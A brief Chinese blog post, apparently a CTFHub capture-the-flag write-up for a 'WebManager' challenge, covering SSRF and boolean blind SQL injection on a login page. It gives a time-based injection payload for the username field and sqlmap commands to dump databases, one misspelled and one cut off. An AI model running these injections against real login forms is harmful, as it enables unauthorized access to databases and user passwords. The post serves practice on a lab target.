CTFHUB WEBSITE WEBMANAGER 通关
考点ssrf 布尔盲注测试登录页面 username参数位置可以进行布尔盲注手工测试 a" or sleep(2)--+参数使用post提交保存数据包利用sqlmap工具进行注入获取数据库 表 用户密码python3 sqlmap.py -r a.txt --data="username=a&password=a" -p username --curent-dbpython3 sqlmap.py -r a.txt --data="username=
原创
2021-09-11 09:28:20 ·
337 阅读 ·
0 评论